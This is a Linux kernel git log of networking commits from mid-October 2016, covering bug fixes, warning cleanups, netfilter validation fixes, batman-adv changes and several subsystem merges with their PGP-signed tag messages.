7ab488951a tcp: Remove unused but set variable
Remove the unused but set variable icsk in listening_get_next to fix the
following GCC warning when building with 'W=1':

  net/ipv4/tcp_ipv4.c: In function ‘listening_get_next’:
  net/ipv4/tcp_ipv4.c:1890:31: warning: variable ‘icsk’ set but not used [-Wunused-but-set-variable]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:34:27 -04:00
Tobias Klauser
7e1670c15c ipv4: Remove unused but set variable
Remove the unused but set variable dev in ip_do_fragment to fix the
following GCC warning when building with 'W=1':

  net/ipv4/ip_output.c: In function ‘ip_do_fragment’:
  net/ipv4/ip_output.c:541:21: warning: variable ‘dev’ set but not used [-Wunused-but-set-variable]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:30:28 -04:00
Tobias Klauser
8d324fd9e1 net/hsr: Remove unused but set variable
Remove the unused but set variable master_dev in check_local_dest to fix
the following GCC warning when building with 'W=1':

  net/hsr/hsr_forward.c: In function ‘check_local_dest’:
  net/hsr/hsr_forward.c:303:21: warning: variable ‘master_dev’ set but not used [-Wunused-but-set-variable]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:28:18 -04:00
David S. Miller
5cbee55736 This is relatively small, mostly to get the SG/crypto
from stack removal fix that crashes things when VMAP
 stack is used in conjunction with software crypto.
 
 Aside from that, we have:
  * a fix for AP_VLAN usage with the nl80211 frame command
  * two fixes (and two preparation patches) for A-MSDU, one
    to discard group-addressed (multicast) and unexpected
    4-address A-MSDUs, the other to validate A-MSDU inner
    MAC addresses properly to prevent controlled port bypass
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJYBcgKAAoJEGt7eEactAAdhUkP/jMVQbLMZ1Jcc9+lsPVGUIga
 I9GeQ4lcnD+4ASeJUhTtemC1IMNL4zMVqaIxbznDXKP7rZRrODVvCPk2TYIw9c5S
 rzF/TRierMFttLu3xY757nAsYg6T7F03JdOQ3SKIb3xOD8pXCWQoVRN14ldroRno
 4stOAtDrpD5wvK2JhlWv1EYlxGVLqLcakZt/BwgDX/cJGkAx49Q/s29FUnesB9Ep
 sCH5chffeQskOL9CrSwboNmucgt4HGQORc4UL/KtPOEBtyfu/LCXEKSqAKVyQZtZ
 OerouOHWqQE5lT2K6qD/KKFW4lV2t1h+xzqsvZk4ZR5o3s+PAGai6D/wf+JgY9Hk
 uor9ju/e0htcI9m0aFdHDnltV0OOwIhR2bxWTuBBUkyFVtdQQY+1MRTTtuunWIB4
 SDYv6LrNL/0HAIuTlPQH99rnsFNnRZCtTpdbT7GRckAMeWMvy19bF2ZB1FXuSn+h
 5dxIo0qkw8nv4Y9wQ6QmgOcSzYyidUrCgLTO516qXVAKY0kl/u4q/zPr0Fmx/qfY
 oxspelDv0qd2NMQwJ/AmwjAjkQBulv5DVLu+cDXdOMkc/EbhzWyvetcHiNukxjHn
 mukCBxTlLoDLug2LFkAPIddEutj+VUEefkf/pD/js8uYuyd9ZnPjiIh6fG25il9a
 cHbMYtANt2EnZjwI9Z74
 =T6t1
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-for-davem-2016-10-18' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211

Johannes Berg says:

====================
This is relatively small, mostly to get the SG/crypto
from stack removal fix that crashes things when VMAP
stack is used in conjunction with software crypto.

Aside from that, we have:
 * a fix for AP_VLAN usage with the nl80211 frame command
 * two fixes (and two preparation patches) for A-MSDU, one
   to discard group-addressed (multicast) and unexpected
   4-address A-MSDUs, the other to validate A-MSDU inner
   MAC addresses properly to prevent controlled port bypass
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:26:15 -04:00
Tobias Klauser
403f0727cb vlan: Remove unnecessary comparison of unsigned against 0
args.u.name_type is of type unsigned int and is always >= 0.

This fixes the following GCC warning:

  net/8021q/vlan.c: In function ‘vlan_ioctl_handler’:
  net/8021q/vlan.c:574:14: warning: comparison of unsigned expression >= 0 is always true [-Wtype-limits]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:25:34 -04:00
Markus Elfring
393b299d2c batman-adv: Less function calls in batadv_is_ap_isolated() after error detection
The variables "tt_local_entry" and "tt_global_entry" were eventually
checked again despite of a corresponding null pointer test before.

* Avoid this double check by reordering a function call sequence
  and the better selection of jump targets.

* Omit the initialisation for these variables at the beginning then.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-18 15:02:43 +02:00
Wei Yongjun
320c975f18 cfg80211: fix possible memory leak in cfg80211_iter_combinations()
'limits' is malloced in cfg80211_iter_combinations() and should be freed
before leaving from the error handling cases, otherwise it will cause
memory leak.

Fixes: 0c317a02ca ("cfg80211: support virtual interfaces with different beacon intervals")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-18 08:52:00 +02:00
Jakub Kicinski
a0e65de715 net: report right mtu value in error message
Check is for max_mtu but message reports min_mtu.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 13:13:23 -04:00
Pablo Neira Ayuso
ccca6607c5 netfilter: nft_range: validate operation netlink attribute
Use nft_parse_u32_check() to make sure we don't get a value over the
unsigned 8-bit integer. Moreover, make sure this value doesn't go over
the two supported range comparison modes.

Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 18:57:02 +02:00
Dan Carpenter
21a9e0f156 netfilter: nft_exthdr: fix error handling in nft_exthdr_init()
"err" needs to be signed for the error handling to work.

Fixes: 36b701fae1 ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:43:54 +02:00
Dan Carpenter
09525a09ad netfilter: nf_tables: underflow in nft_parse_u32_check()
We don't want to allow negatives here.

Fixes: 36b701fae1 ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:43:53 +02:00
Liping Zhang
5751e175c6 netfilter: nft_hash: add missing NFTA_HASH_OFFSET's nla_policy
Missing the nla_policy description will also miss the validation check
in kernel.

Fixes: 70ca767ea1 ("netfilter: nft_hash: Add hash offset value")
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:43:53 +02:00
Liping Zhang
f434ed0a00 netfilter: xt_ipcomp: add "ip[6]t_ipcomp" module alias name
Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded:
  # iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1
  iptables: No chain/target/match by that name.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:38:19 +02:00
Liping Zhang
6d19375b58 netfilter: xt_NFLOG: fix unexpected truncated packet
Justin and Chris spotted that iptables NFLOG target was broken when they
upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
"results in segfaults in ulogd-2.0.5".

Because "struct nf_loginfo li;" is a local variable, and flags will be
filled with garbage value, not inited to zero. So if it contains 0x1,
packets will not be logged to the userspace anymore.

Fixes: 7643507fe8 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com>
Reported-by: Chris Caputo <ccaputo@alt.net>
Tested-by: Chris Caputo <ccaputo@alt.net>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:38:19 +02:00
Anders K. Pedersen
a8b1e36d0d netfilter: nft_dynset: fix element timeout for HZ != 1000
With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times
higher than configured.

Add proper conversion to/from jiffies, when interacting with userspace.

I tested this on Linux 4.8.1, and it applies cleanly to current nf and
nf-next trees.

Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:29:39 +02:00
Geert Uytterhoeven
1b203c138c netfilter: xt_hashlimit: Add missing ULL suffixes for 64-bit constants
On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1):

    net/netfilter/xt_hashlimit.c: In function ‘user2credits’:
    net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type
    ...
    net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type
    ...
    net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type
    ...

    net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’:
    net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type

Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Acked-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:25:23 +02:00
Joe Perches
9c7cbcf5a8 rds: Remove duplicate prefix from rds_conn_path_error use
rds_conn_path_error already prefixes "RDS:" to the output.

Signed-off-by: Joe Perches <joe@perches.com>
Acked-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 11:07:22 -04:00
Joe Perches
e81c7b69c8 rds: Remove unused rds_conn_error
This macro's last use was removed in commit d769ef81d5
("RDS: Update rds_conn_shutdown to work with rds_conn_path")
so make the macro and the __rds_conn_error function definition
and declaration disappear.

Signed-off-by: Joe Perches <joe@perches.com>
Acked-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 11:07:22 -04:00
Eric Dumazet
9a0b1e8ba4 net: pktgen: remove rcu locking in pktgen_change_name()
After Jesper commit back in linux-3.18, we trigger a lockdep
splat in proc_create_data() while allocating memory from
pktgen_change_name().

This patch converts t->if_lock to a mutex, since it is now only
used from control path, and adds proper locking to pktgen_change_name()

1) pktgen_thread_lock to protect the outer loop (iterating threads)
2) t->if_lock to protect the inner loop (iterating devices)

Note that before Jesper patch, pktgen_change_name() was lacking proper
protection, but lockdep was not able to detect the problem.

Fixes: 8788370a1d ("pktgen: RCU-ify "if_list" to remove lock in next_to_run()")
Reported-by: John Sperbeck <jsperbeck@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 10:52:59 -04:00
Tom Herbert
ab3a70bef8 ila: Don't use dest cache when gateway is set
If the gateway is set on an ILA route we don't need to bother with using
the destination cache in the ILA route. Translation does not change the
routing in this case so we can stick with orig_output in the lwstate
output function.

Tested: Ran netperf with and without gateway for LWT route.

Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 10:30:18 -04:00
Linus Lüssing
0566df307b batman-adv: Allow selecting BATMAN V if CFG80211 is not built
With the new stub for cfg80211_get_station(), we can now build the
BATMAN V protocol even with a kernel that was built without any
wireless support.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:48 +02:00
Antonio Quartulli
843314c977 batman-adv: remove unsed argument from batadv_dbg_arp() function
The argument "type" passed to the batadv_dbg_arp() function is
never used. Remove it.

Signed-off-by: Antonio Quartulli <a@unstable.cc>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:47 +02:00
Linus Lüssing
6020a86a4a batman-adv: fix batadv_forw_packet kerneldoc for list attribute
The forw_packet list node is wrongly attributed to the icmp socket code.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:47 +02:00
Sven Eckelmann
bf093191db batman-adv: Remove unused batadv_icmp_user_cmd_type
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:46 +02:00
Sven Eckelmann
c408c1b9d4 batman-adv: Move batadv_sum_counter to soft-interface.c
The function batadv_sum_counter is only used in soft-interface.c and has no
special relevance for main.h.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:46 +02:00
Sven Eckelmann
739ae86cd2 batman-adv: Remove unused function batadv_hash_delete
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:45 +02:00
David Ahern
a04a480d43 net: Require exact match for TCP socket lookups if dif is l3mdev
Currently, socket lookups for l3mdev (vrf) use cases can match a socket
that is bound to a port but not a device (ie., a global socket). If the
sysctl tcp_l3mdev_accept is not set this leads to ack packets going out
based on the main table even though the packet came in from an L3 domain.
The end result is that the connection does not establish creating
confusion for users since the service is running and a socket shows in
ss output. Fix by requiring an exact dif to sk_bound_dev_if match if the
skb came through an interface enslaved to an l3mdev device and the
tcp_l3mdev_accept is not set.

skb's through an l3mdev interface are marked by setting a flag in
inet{6}_skb_parm. The IPv6 variant is already set; this patch adds the
flag for IPv4. Using an skb flag avoids a device lookup on the dif. The
flag is set in the VRF driver using the IP{6}CB macros. For IPv4, the
inet_skb_parm struct is moved in the cb per commit 971f10eca1, so the
match function in the TCP stack needs to use TCP_SKB_CB. For IPv6, the
move is done after the socket lookup, so IP6CB is used.

The flags field in inet_skb_parm struct needs to be increased to add
another flag. There is currently a 1-byte hole following the flags,
so it can be expanded to u16 without increasing the size of the struct.

Fixes: 193125dbd8 ("net: Introduce VRF device driver")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 10:17:05 -04:00
Ard Biesheuvel
f4a067f9ff mac80211: move struct aead_req off the stack
Some crypto implementations (such as the generic CCM wrapper in crypto/)
use scatterlists to map fields of private data in their struct aead_req.
This means these data structures cannot live in the vmalloc area, which
means that they cannot live on the stack (with CONFIG_VMAP_STACK.)

This currently occurs only with the generic software implementation, but
the private data and usage is implementation specific, so move the whole
data structures off the stack into heap by allocating every time we need
to use them.

In addition, take care not to put any of our own stack allocations into
scatterlists. This involves reserving some extra room when allocating the
aead_request structures, and referring to those allocations in the scatter-
lists (while copying the data from the stack before the crypto operation)

Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 16:14:04 +02:00
Sven Eckelmann
611b975b5c batman-adv: Add BATADV_DBG_TP_METER to BATADV_DBG_ALL
The BATADV_DBG_ALL has to contain the bit of BATADV_DBG_TP_METER to really
support all available debug messages.

Fixes: 33a3bb4a33 ("batman-adv: throughput meter implementation")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:11:56 +02:00
Sven Eckelmann
9ca488dd53 batman-adv: Modify neigh_list only with rcu-list functions
The batadv_hard_iface::neigh_list is accessed via rcu based primitives.
Thus all operations done on it have to fulfill the requirements by RCU. So
using non-RCU mechanisms like hlist_add_head is not allowed because it
misses the barriers required to protect concurrent readers when accessing
the data behind the pointer.

Fixes: cef63419f7 ("batman-adv: add list of unique single hop neighbors per hard-interface")
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:10:53 +02:00
Simon Wunderlich
4a2d09e31d batman-adv: Start new development cycle
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 14:10:28 +02:00
Michael Braun
a3e2f4b6ed mac80211: fix A-MSDU outer SA/DA
According to IEEE 802.11-2012 section 8.3.2 table 8-19, the outer SA/DA
of A-MSDU frames need to be changed depending on FromDS/ToDS values.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[use ether_addr_copy and add alignment annotations]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 11:43:33 +02:00
Michael Braun
06f2bb1e01 mac80211: avoid extra memcpy in A-MSDU head creation
Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 11:41:23 +02:00
Johannes Berg
f83ace3b1e nl80211: ifdef WoWLAN related policies
To avoid unused variable warnings when CONFIG_PM isn't set,
add the appropriate ifdef to the policies that are only used
for WoWLAN, which can only be invoked when CONFIG_PM is set.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 08:04:07 +02:00
Johannes Berg
1609d18de6 nl80211: correctly use nl80211_nan_srf_policy
This was clearly intended to be used in the attribute parsing,
so do that instead of leaving the attribute policy unused.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 08:02:48 +02:00
Tom Herbert
79ff2fc31e ila: Cache a route to translated address
Add a dst_cache to ila_lwt structure. This holds a cached route for the
translated address. In ila_output we now perform a route lookup after
translation and if possible (destination in original route is full 128
bits) we set the dst_cache. Subsequent calls to ila_output can then use
the cache to avoid the route lookup.

This eliminates the need to set the gateway on ILA routes as previously
was being done. Now we can do something like:

./ip route add 3333::2000:0:0:2/128 encap ila 2222:0:0:2 \
    csum-mode neutral-map dev eth0  ## No via needed!

Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-15 17:33:41 -04:00
Tom Herbert
1104d9ba44 lwtunnel: Add destroy state operation
Users of lwt tunnels may set up some secondary state in build_state
function. Add a corresponding destroy_state function to allow users to
clean up state. This destroy state function is called from lwstate_free.
Also, we now free lwstate using kfree_rcu so user can assume structure
is not freed before rcu.

Acked-by: Roopa Prabhu <roopa@cumulusnetworks.com>
Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-15 17:33:41 -04:00
Linus Torvalds
9ffc66941d This adds a new gcc plugin named "latent_entropy". It is designed to
extract as much possible uncertainty from a running system at boot time as
 possible, hoping to capitalize on any possible variation in CPU operation
 (due to runtime data differences, hardware differences, SMP ordering,
 thermal timing variation, cache behavior, etc).
 
 At the very least, this plugin is a much more comprehensive example for
 how to manipulate kernel code using the gcc plugin internals.
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1
 Comment: Kees Cook <kees@outflux.net>
 
 iQIcBAABCgAGBQJX/BAFAAoJEIly9N/cbcAmzW8QALFbCs7EFFkML+M/M/9d8zEk
 1QbUs/z8covJTTT1PjSdw7JUrAMulI3S00owpcQVd/PcWjRPU80QwfsXBgIB0tvC
 Kub2qxn6Oaf+kTB646zwjFgjdCecw/USJP+90nfcu2+LCnE8ReclKd1aUee+Bnhm
 iDEUyH2ONIoWq6ta2Z9sA7+E4y2ZgOlmW0iga3Mnf+OcPtLE70fWPoe5E4g9DpYk
 B+kiPDrD9ql5zsHaEnKG1ldjiAZ1L6Grk8rGgLEXmbOWtTOFmnUhR+raK5NA/RCw
 MXNuyPay5aYPpqDHFm+OuaWQAiPWfPNWM3Ett4k0d9ZWLixTcD1z68AciExwk7aW
 SEA8b1Jwbg05ZNYM7NJB6t6suKC4dGPxWzKFOhmBicsh2Ni5f+Az0BQL6q8/V8/4
 8UEqDLuFlPJBB50A3z5ngCVeYJKZe8Bg/Swb4zXl6mIzZ9darLzXDEV6ystfPXxJ
 e1AdBb41WC+O2SAI4l64yyeswkGo3Iw2oMbXG5jmFl6wY/xGp7dWxw7gfnhC6oOh
 afOT54p2OUDfSAbJaO0IHliWoIdmE5ZYdVYVU9Ek+uWyaIwcXhNmqRg+Uqmo32jf
 cP5J9x2kF3RdOcbSHXmFp++fU+wkhBtEcjkNpvkjpi4xyA47IWS7lrVBBebrCq9R
 pa/A7CNQwibIV6YD8+/p
 =1dUK
 -----END PGP SIGNATURE-----

Merge tag 'gcc-plugins-v4.9-rc1' of git://git.kernel.org/pub/scm/linux/kernel/git/kees/linux

Pull gcc plugins update from Kees Cook:
 "This adds a new gcc plugin named "latent_entropy". It is designed to
  extract as much possible uncertainty from a running system at boot
  time as possible, hoping to capitalize on any possible variation in
  CPU operation (due to runtime data differences, hardware differences,
  SMP ordering, thermal timing variation, cache behavior, etc).

  At the very least, this plugin is a much more comprehensive example
  for how to manipulate kernel code using the gcc plugin internals"

* tag 'gcc-plugins-v4.9-rc1' of git://git.kernel.org/pub/scm/linux/kernel/git/kees/linux:
  latent_entropy: Mark functions with __latent_entropy
  gcc-plugins: Add latent_entropy plugin
2016-10-15 10:03:15 -07:00
Jiri Bohac
76506a986d IPv6: fix DESYNC_FACTOR
The IPv6 temporary address generation uses a variable called DESYNC_FACTOR
to prevent hosts updating the addresses at the same time. Quoting RFC 4941:

   ... The value DESYNC_FACTOR is a random value (different for each
   client) that ensures that clients don't synchronize with each other and
   generate new addresses at exactly the same time ...

DESYNC_FACTOR is defined as:

   DESYNC_FACTOR -- A random value within the range 0 - MAX_DESYNC_FACTOR.
   It is computed once at system start (rather than each time it is used)
   and must never be greater than (TEMP_VALID_LIFETIME - REGEN_ADVANCE).

First, I believe the RFC has a typo in it and meant to say: "and must
never be greater than (TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE)"

The reason is that at various places in the RFC, DESYNC_FACTOR is used in
a calculation like (TEMP_PREFERRED_LIFETIME - DESYNC_FACTOR) or
(TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE - DESYNC_FACTOR). It needs to be
smaller than (TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE) for the result of
these calculations to be larger than zero. It's never used in a
calculation together with TEMP_VALID_LIFETIME.

I already submitted an errata to the rfc-editor:
https://www.rfc-editor.org/errata_search.php?rfc=4941

The Linux implementation of DESYNC_FACTOR is very wrong:
max_desync_factor is used in places DESYNC_FACTOR should be used.
max_desync_factor is initialized to the RFC-recommended value for
MAX_DESYNC_FACTOR (600) but the whole point is to get a _random_ value.

And nothing ensures that the value used is not greater than
(TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE), which leads to underflows.  The
effect can easily be observed when setting the temp_prefered_lft sysctl
e.g. to 60. The preferred lifetime of the temporary addresses will be
bogus.

TEMP_PREFERRED_LIFETIME and REGEN_ADVANCE are not constants and can be
influenced by these three sysctls: regen_max_retry, dad_transmits and
temp_prefered_lft. Thus, the upper bound for desync_factor needs to be
re-calculated each time a new address is generated and if desync_factor is
larger than the new upper bound, a new random value needs to be
re-generated.

And since we already have max_desync_factor configurable per interface, we
also need to calculate and store desync_factor per interface.

Signed-off-by: Jiri Bohac <jbohac@suse.cz>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:59:15 -04:00
Jiri Bohac
9d6280da39 IPv6: Drop the temporary address regen_timer
The randomized interface identifier (rndid) was periodically updated from
the regen_timer timer. Simplify the code by updating the rndid only when
needed by ipv6_try_regen_rndid().

This makes the follow-up DESYNC_FACTOR fix much simpler.  Also it fixes a
reference counting error in this error path, where an in6_dev_put was
missing:
		err = addrconf_sysctl_register(ndev);
		if (err) {
			ipv6_mc_destroy_dev(ndev);
	-               del_timer(&ndev->regen_timer);
			snmp6_unregister_dev(ndev);
			goto err_release;

Signed-off-by: Jiri Bohac <jbohac@suse.cz>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:59:15 -04:00
David S. Miller
f1f081cef0 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV/+wwfSw1s6N8H32AQLpVA/+NByreKyI8cHL1zgz816iTrzYbEP5Gbtw
 RI9TI5iweUa9ySe4PFQUw+VC0yaAP9brY8tTtss8KHk808Wu4xhlg8fAClOaZXwy
 WmHASdwnRaDWguEpPHyHRST+s9ZO/VD5vwGhREB/hojzdzd135bq1d6GKaHoLFx2
 XDwDeyZc1z+aSzdMCoQuKJlqw9mfujsIOK5xZJ/h/JquYJ3iER55vdofettNCT+S
 hjueVBgWV988oORBtduPrfUYBbQI83QyiWl0xdo6QXWAoN784NfpVti8YAA9B7To
 qfup5aE6ky3LhuRD8GS00yWb96b43FGuPqt27LTH7SGnALX7KbETbBcgasyWqFeV
 UvPbVlk5R+0OXLxqOHvn20gRFS2c6HIdVAW6h7QHB0qwnLS1JJJToAczhK4QTsHQ
 eOXSGK4Gj0CiTd23bL7egaULKnD7eiZbagoty1UL05k8TAgPRnXXaMCRc0cupvKo
 5Amk7xT7ZN1Iyh9TQSt2MRIBIG6AOJogsmjSqgKJZY4YdCD5rYAWyAzc7K2l/L0e
 oUwDaPFWwNAfVYxJIXSd223squyxaXen0B+NlY501tqw4Ce4NnuEssqsSWk6OTHZ
 R9HCT200HvvZthPOStP7rdFiQ6VRDH3aSdl3zU4ila7cxr4wfdVslShuj91OiLqI
 /7zodCmls/8=
 =7krl
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20161013' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Fixes

This set of patches contains a bunch of fixes:

 (1) Fix use of kunmap() after change from kunmap_atomic() within AFS.

 (2) Don't use of ERR_PTR() with an always zero value.

 (3) Check the right error when using ip6_route_output().

 (4) Be consistent about whether call->operation_ID is BE or CPU-E within
     AFS.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:44:45 -04:00
Shmulik Ladkani
53592b3640 net/sched: act_mirred: Implement ingress actions
Up until now, 'action mirred' supported only egress actions (either
TCA_EGRESS_REDIR or TCA_EGRESS_MIRROR).

This patch implements the corresponding ingress actions
TCA_INGRESS_REDIR and TCA_INGRESS_MIRROR.

This allows attaching filters whose target is to hand matching skbs into
the rx processing of a specified device.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Cc: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Jamal Hadi Salim <jhs@mojatatu.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:23:07 -04:00
Shmulik Ladkani
dcf800344a net/sched: act_mirred: Refactor detection whether dev needs xmit at mac header
Move detection logic that tests whether device expects skb data to point
at mac_header upon xmit into a function.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:23:06 -04:00
Shmulik Ladkani
165779231f net/sched: act_mirred: Rename tcfm_ok_push to tcfm_mac_header_xmit and make it a bool
'tcfm_ok_push' specifies whether a mac_len sized push is needed upon
egress to the target device (if action is performed at ingress).

Rename it to 'tcfm_mac_header_xmit' as this is actually an attribute of
the target device (and use a bool instead of int).

This allows to decouple the attribute from the action to be taken.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:23:06 -04:00
Nicolas Dichtel
a220445f9f ipv6: correctly add local routes when lo goes up
The goal of the patch is to fix this scenario:
 ip link add dummy1 type dummy
 ip link set dummy1 up
 ip link set lo down ; ip link set lo up

After that sequence, the local route to the link layer address of dummy1 is
not there anymore.

When the loopback is set down, all local routes are deleted by
addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still
exists, because the corresponding idev has a reference on it. After the rcu
grace period, dst_rcu_free() is called, and thus ___dst_free(), which will
set obsolete to DST_OBSOLETE_DEAD.

In this case, init_loopback() is called before dst_rcu_free(), thus
obsolete is still sets to something <= 0. So, the function doesn't add the
route again. To avoid that race, let's check the rt6 refcnt instead.

Fixes: 25fb6ca4ed ("net IPv6 : Fix broken IPv6 routing table after loopback down-up")
Fixes: a881ae1f62 ("ipv6: don't call addrconf_dst_alloc again when enable lo")
Fixes: 33d99113b1 ("ipv6: reallocate addrconf router for ipv6 address when lo device up")
Reported-by: Francesco Santoro <francesco.santoro@6wind.com>
Reported-by: Samuel Gauthier <samuel.gauthier@6wind.com>
CC: Balakumaran Kannan <Balakumaran.Kannan@ap.sony.com>
CC: Maruthi Thotad <Maruthi.Thotad@ap.sony.com>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Weilong Chen <chenweilong@huawei.com>
CC: Gao feng <gaofeng@cn.fujitsu.com>
